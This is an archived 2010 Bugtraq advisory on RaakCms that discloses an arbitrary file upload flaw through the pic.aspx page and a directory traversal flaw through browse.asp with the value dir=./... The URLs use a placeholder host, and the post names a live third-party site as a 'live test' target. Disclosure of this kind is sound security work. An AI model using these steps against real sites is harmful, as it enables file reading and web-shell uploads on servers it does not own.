Bugtraq mailing list archives
RaakCms Multiple Vulnerabilities
From: info () securitylab ir
Date: Sun, 31 Jan 2010 00:44:48 -0700
################################################################# # Securitylab.ir ################################################################# # Application Info: # Name: RaakCms # Vendor: http://raakcms.com ################################################################# Vulnerability: ======================= Arbitrary File Upload ======================= http://site.ir/webmaster/pic.aspx select file and folder , your file upload here: http://site.ir/User_Images/[Folder]/FILE.ASPX ======================= Directory Traversal ======================= http://site.ir/browse.asp?dir=./.. http://site.ir/browseFile.asp?dir=./.. ################################################################# Live test: http://behzisty-kj.ir ################################################################# # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir & whh_iran () yahoo com ###################################################################
Current thread:
- RaakCms Multiple Vulnerabilities info (Feb 01)